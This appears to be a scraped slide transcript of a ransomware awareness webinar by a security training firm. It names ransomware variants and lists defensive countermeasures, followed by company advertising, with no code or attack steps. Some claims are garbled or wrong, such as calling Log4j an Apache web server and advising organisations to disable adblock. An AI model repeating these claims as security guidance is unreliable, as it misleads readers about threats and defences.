Ransomware- A Reality Check (Part 2) - PowerPoint PPT Presentation

About This Presentation
Title:

Ransomware- A Reality Check (Part 2)

Description:

Ransomware has been the most significant threat for years which has been affected over sectors and remained one of the top risks. The topics covered in the webinar are detailed in this blog for reference. – PowerPoint PPT presentation

Number of Views:37
Slides: 17
Provided by: infosectrain

less

Transcript and Presenter's Notes

Title: Ransomware- A Reality Check (Part 2)


1
Ransomware- A Reality Check (Part 2)
www.infosectrain.com sales_at_infosectrain.com
2
www.infosectrain.com sales_at_infosectrain.com
3
  • Ransomware- A reality check (Part 1)
  • Ransomware- A reality check (Part 2)
  • Ransomware- A reality check (Part 3)

www.infosectrain.com sales_at_infosectrain.com
4
Variants of Ransomware Bad Rabbit It was
distributed by a fake Adobe Flash update on a
corrupt website. Fake Adobe Flash update once it
is downloaded, your data has been
compromised. Crypto wall Malware hides in your
zip files and other email attachments, and then
it makes its way to your devices. Once you
install them, it tries to find java
vulnerabilities to encrypt or withhold your
data. Patia It is a crypto-ransomware that
targets your Windows servers, laptops, or PC and
mostly takes advantage of SMB (Server Message
Block) and tries to steal your credentials and
spread them into your machine. Wanna cry It was
first seen in a large-scale crypto-ransomware
attack in 2017. It affected almost a
quarter-million machines internationally, and it
spreads through your windows operating
system. Black Byte It is a notorious variant
that compromised multiple US and foreign
businesses, including three critical US
infrastructure sectors. It encrypts your files
and compromises the Windows host system,
including physical and virtual servers.
www.infosectrain.com sales_at_infosectrain.com
5
Countermeasures The following are the
countermeasures or defense mechanisms to be
implemented to ensure safe data transfer
www.infosectrain.com sales_at_infosectrain.com
6
Using Firewall to its fullest capability Firewalls
are the most reliable. If a firewall does not
allow a malicious web request or an email
security gateway has been implemented, then the
users will not get any malicious attacks or
emails. But if the firewall fails, there should
be backup plans. Log4j attack Log4j
vulnerability, an Apache web server, has been
exploited in the wild by executing games and
transforming from exploiting the game servers to
the actual corporate servers. User Education For
example, if an email passes through an email
security gateway and firewall, and if the user is
unaware of potential phishing emails, it develops
the attack surface. Kevin Mitnick, the most
notorious hacker, started phishing the telephone,
and the FBI searched for him a lot. There is
training from this company called KnowBe4 that
makes the user aware of phishing and how to
identify emails received from an unsuspected user.




www.infosectrain.com sales_at_infosectrain.com
7
Disabling Macros execution Now the execution of
macros is the popular one where people get
exploited. For example, a malicious document is
attached to a mail received by the user unaware
of it and thinks it is legitimate. He then opens
the documents, and therefore the macros get
enabled in the organization if he uses the
organization network. Macros are small code
blocks that get executed automatically in the
background, primarily when an office application
is based on a visual basis. These codes are
written to exploit any existing vulnerabilities
in the computers.




www.infosectrain.com sales_at_infosectrain.com
8
Implement Web security The Cross-site scripting
attack- suppose your browser is vulnerable to any
particular attack. These types of vulnerabilities
of the browsers are exploited by visiting any
malicious website. Theres a well-known chef
Jamie Oliver, whose website was vulnerable. As
everyone visiting his website had downloaded the
malicious code in the background. To overcome
such malicious code, every organization should
implement WAF rules and disable adblock.




www.infosectrain.com sales_at_infosectrain.com
9
Incorporate least privilege policy Rule-based
access control and our backup is most important.
The privileged access to people only to perform
the activity, not the full access, is part of a
defense-in-depth strategy. Network
Segmentation The HR Department is the one who
receives more external emails document or PDF
files when compared to the software development
department. Do you think both guys should work on
the same network to implement high security?. If
HR receives a malicious email and clicks, the
malware starts spreading in the environment. For
example, Wipro was part of the MSSP attack. A
supply chain attack has been infected because
some other team had clicked some URL that led
people to come into the network. If they had
segmented their network, they would have
prevented it.




www.infosectrain.com sales_at_infosectrain.com
10
Active monitoring Security Analyst Security
Operation Center (SOC) monitors 24/7 alerts. They
look to modify and identify the attacks. For
example, when they figured out that log4j was
being exploited by 3000 times of log4j attempts,
they implemented alerts and security measures to
block the attempt and notify us. That helps to
take further steps and investigate that
particular source or IP address. Action
Plan Its not about how you will be attacked
its about when you will be attacked. Even
organizations with high security are compromised,
and an Action plan helps in this case. A clear
and detailed action plan of what to do and how to
do it when an attack occurs includes the most
practical and effective countermeasure to
implement quickly.




www.infosectrain.com sales_at_infosectrain.com
11
About InfosecTrain
  • Established in 2016, we are one of the finest
    Security and Technology Training and Consulting
    company
  • Wide range of professional training programs,
    certifications consulting services in the IT
    and Cyber Security domain
  • High-quality technical services, certifications
    or customized training programs curated with
    professionals of over 15 years of combined
    experience in the domain

www.infosectrain.com sales_at_infosectrain.com
12
Our Endorsements
www.infosectrain.com sales_at_infosectrain.com
13
Why InfosecTrain
Global Learning Partners
Access to the recorded sessions
Certified and Experienced Instructors
Flexible modes of Training
Tailor Made Training
Post training completion
www.infosectrain.com sales_at_infosectrain.com
14
Our Trusted Clients
www.infosectrain.com sales_at_infosectrain.com
15
(No Transcript)
16
Contact us
Get your workforce reskilled by our certified and
experienced instructors!
IND 1800-843-7890 (Toll Free) / US 1
657-221-1127 / UK 44 7451 208413
sales_at_infosectrain.com
www.infosectrain.com
Write a Comment
User Comments (0)
About PowerShow.com